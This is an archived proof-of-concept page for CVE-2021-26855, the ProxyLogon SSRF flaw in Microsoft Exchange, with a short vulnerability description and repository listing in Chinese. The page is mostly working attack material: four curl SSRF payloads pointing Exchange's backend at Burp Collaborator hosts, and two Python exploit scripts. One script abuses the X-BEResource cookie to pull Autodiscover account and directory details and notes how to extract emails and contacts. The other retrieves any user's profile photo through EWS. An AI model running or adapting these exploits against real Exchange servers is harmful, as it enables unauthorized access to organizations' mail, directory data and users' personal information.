关联漏洞
标题:Microsoft Exchange Server 代码问题漏洞 (CVE-2021-26855)描述:Microsoft Exchange Server是美国微软(Microsoft)公司的一套电子邮件服务程序。它提供邮件存取、储存、转发,语音邮件,邮件过滤筛选等功能。 Microsoft Exchange Server 安全漏洞。攻击者可构造恶意HTTP请求,并通过Exchange Server进行身份验证。进而扫描内网,获取用户敏感信息。以下产品和版本受到影响:Microsoft Exchange Server 2013 Cumulative Update 23,Microsoft Exchange
介绍
# CVE-2021-26855_PoC
My early SSRF payloads (CVE-2021-26855) over Exchange Server 2019...
Payload (1)
```
# curl -i -s -k -X $'GET' -H $'Host: <exchange_server>' -H $'User-Agent: alex666' -H $'Connection: close' -b $'X-AnonResource=true; X-AnonResource-Backend=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net/owa/auth/logon.aspx?~3' $'https://<exchange_server>/owa/auth/Current/themes/resources/logon.css'
```
Payload (2)
```
# curl -i -s -k -X $'GET' -H $'Host: <exchange_server>' -H $'User-Agent: alex666' -H $'Connection: close' -b $'X-BEResource=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net/api/endpoint#~1' $'https://<exchange_server>/ecp/favicon.ico'
```
Payload (3)
```
# curl -i -s -k -X $'GET' -H $'Host: <exchange_server>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Length: 0' -b $'X-BEResource=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net#~1' $'https://<exchange_server>/ecp/favicon.ico'
```
Payload (4)
```
# curl -i -s -k -X $'GET' -H $'Host: <exchange_server>' -H $'User-Agent: alex666' -H $'Connection: close' -b $'X-AnonResource=true; X-AnonResource-Backend=sgca4i4yj8wrpuipvxeupawsqjw9ky.burpcollaborator.net/#~1' $'https://<exchange_server>/owa/auth/favicon.ico'
```
[../snip]
# PoC Exploit Exchange Server SSRF Authenticated Backend Service (CVE-2021-26855) (1)
Updated: Autodiscover
```python
# PoC Exploit Exchange Server SSRF Authenticated Backend Service (CVE-2021-26855)
# By Alex Hernandez aka alt3kx (c) Mar 2021")
#
# Reference: https://www.praetorian.com/blog/reproducing-proxylogon-exploit/")
# Usage: python ssrf_auto.py <target> <email>")
# Example: python ssrf_auto.py mail.exchange.com administrator@exchange.com")
#
#
import requests
from urllib3.exceptions import InsecureRequestWarning
import random
import string
import sys
import os
#proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
if len(sys.argv) < 2:
os.system('clear')
print("PoC Exploit Exchange Server SSRF Authenticated Backend Service (CVE-2021-26855)")
print("By Alex Hernandez aka alt3kx (c) Mar 2021")
print("Reference: https://www.praetorian.com/blog/reproducing-proxylogon-exploit/\n")
print("Usage: python ssrf_auto.py <target> <email>")
print("Example: python ssrf_auto.py mail.exchange.com administrator@exchange.com")
exit()
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
target = sys.argv[1]
email = sys.argv[2]
random_name = id_generator(3) + ".js"
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
""" % email
print("[+] \033[1mAttacking Exchange Server:\033[00m " + target)
FQDN = "EXCHANGE"
ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522",
"User-Agent": user_agent},
verify=False, #proxies=proxies
)
if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:
FQDN = ct.headers["X-FEServer"]
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN,
"Content-Type": "text/xml",
"User-Agent": user_agent},
data=autoDiscoverBody,
verify=False,
#proxies=proxies
)
if ct.status_code != 200:
print("[-] Autodiscover Error!")
exit()
if "<LegacyDN>" not in ct.content:
print("[-] Can not get LegacyDN! from " + email)
exit()
legacyDn = ct.content.split("<LegacyDN>")[1].split("</LegacyDN>")[0]
DisplayName = ct.content.split("<DisplayName>")[1].split("</DisplayName>")[0]
Address = ct.content.split("<AutoDiscoverSMTPAddress>")[1].split("</AutoDiscoverSMTPAddress>")[0]
AccountType = ct.content.split("<AccountType>")[1].split("</AccountType>")[0]
MicrosoftOnline = ct.content.split("<MicrosoftOnline>")[1].split("</MicrosoftOnline>")[0]
PublicFolderServer = ct.content.split("<PublicFolderServer>")[1].split("</PublicFolderServer>")[0]
Server = ct.content.split("<Server>")[1].split("</Server>")[0]
AD = ct.content.split("<AD>")[1].split("</AD>")[0]
ServerExclusiveConnect = ct.content.split("<ServerExclusiveConnect>")[1].split("</ServerExclusiveConnect>")[0]
AuthPackage = ct.content.split("<AuthPackage>")[1].split("</AuthPackage>")[0]
CertPrincipalName = ct.content.split("<CertPrincipalName>")[1].split("</CertPrincipalName>")[0]
OWAUrl = ct.content.split("<OWAUrl AuthenticationMethod=")[1].split("</OWAUrl>")[0]
OOFUrl = ct.content.split("<OOFUrl>")[1].split("</OOFUrl>")[0]
print("[+] \033[32mSuccess!\033[00m: SSRF Authenticated on Backend Service")
print("[+] Got details...")
print("[+] Name: " + DisplayName)
print("[+] DN: " + legacyDn)
print("[+] SMTP Address: " + Address)
print("[+] Account Type: " + AccountType)
print("[+] Microsoft Online status: " + MicrosoftOnline)
print("[+] Public folder Server: " + PublicFolderServer)
print("[+] Server: " + Server)
print("[+] AD: " + AD)
print("[+] Server Exclusive Connect status: " + ServerExclusiveConnect)
print("[+] Authentication Package used: " + AuthPackage)
print("[+] Cert Principal Name status: " + CertPrincipalName)
print("[+] OWA URL: " + OWAUrl)
print("[+] OOF Url: " + OOFUrl + "\t<- Use this URL to extract emails, contacts from BackEnd Service")
```
# PoC Exploit Exchange Server SSRF Authenticated Backend Service (CVE-2021-26855) (2)
Updated: Get the photo profile from any user/email :D
```python
# PoC Exploit Exchange Server SSRF Authenticated Backend Service (CVE-2021-26855)
# By Alex Hernandez aka alt3kx (c) Mar 2021")
#
# Reference: https://www.praetorian.com/blog/reproducing-proxylogon-exploit/")
# Usage: python ssrf_getphoto.py <target> <email>")
# Example: python ssrf_getphoto.py mail.exchange.com administrator@exchange.com")
#
#
import requests
from urllib3.exceptions import InsecureRequestWarning
import random
import string
import sys
import os
#proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
if len(sys.argv) < 2:
os.system('clear')
print("PoC Exploit Exchange Server SSRF Authenticated Backend Service (CVE-2021-26855)")
print("By Alex Hernandez aka alt3kx (c) Mar 2021")
print("Reference: https://www.praetorian.com/blog/reproducing-proxylogon-exploit/\n")
print("Usage: python ssrf_getphoto.py <target> <email>")
print("Example: python ssrf_getphoto.py mail.exchange.com administrator@exchange.com")
exit()
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
target = sys.argv[1]
email = sys.argv[2]
random_name = id_generator(3) + ".js"
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
SoapBody = """<?xml version="1.0" encoding="utf-8" ?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
<soap:Header>
<t:RequestServerVersion Version="Exchange2013"/>
</soap:Header>
<soap:Body>
<m:GetUserPhoto>
<m:Email>%s</m:Email>
<m:SizeRequested>HR48x48</m:SizeRequested>
</m:GetUserPhoto>
</soap:Body>
</soap:Envelope>
""" % email
print("[+] \033[1mAttacking Exchange Server:\033[00m " + target)
FQDN = "EXCHANGE"
ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522",
"User-Agent": user_agent},
verify=False, #proxies=proxies
)
if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:
FQDN = ct.headers["X-FEServer"]
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=%s/EWS/Exchange.asmx?a=~3;" % FQDN,
"Content-Type": "text/xml",
"User-Agent": user_agent},
data=SoapBody,
verify=False,
#proxies=proxies
)
#if ct.status_code != 200:
# print("[-] SoapBody Error!")
# exit()
if "</PictureData>" not in ct.content:
print("[-] Can not get photo profile from " + email )
exit()
ResponseCode = ct.content.split("<ResponseCode>")[1].split("</ResponseCode>")[0]
ContentType = ct.content.split("<ContentType>")[1].split("</ContentType>")[0]
PictureData = ct.content.split("<PictureData>")[1].split("</PictureData>")[0]
print("[+] \033[32mSuccess\033[00m: SSRF Authenticated on Backend Service")
print("[+] Got the picture!...")
print("[+] Response Code status: " + ResponseCode)
print("[+] Content type : " + ContentType)
print("[+] Photo profile from : " + email)
print("[+] Picture on Base64 format from : " + PictureData)
```
# Reference:
https://www.praetorian.com/blog/reproducing-proxylogon-exploit/
# Author
Alex Hernandez aka <em><a href="https://twitter.com/_alt3kx_" rel="nofollow">(@\_alt3kx\_)</a></em>
文件快照
[4.0K] /data/pocs/d1c5be46edbb3b3d600580aec8d66c016de2d3cb
├── [1.4M] CVE-2021-26855.gif
├── [10.0K] README.md
├── [178K] ssrf_auto.png
├── [4.4K] ssrf_auto.py
├── [292K] ssrf_getphoto.png
└── [3.5K] ssrf_getphoto.py
0 directories, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。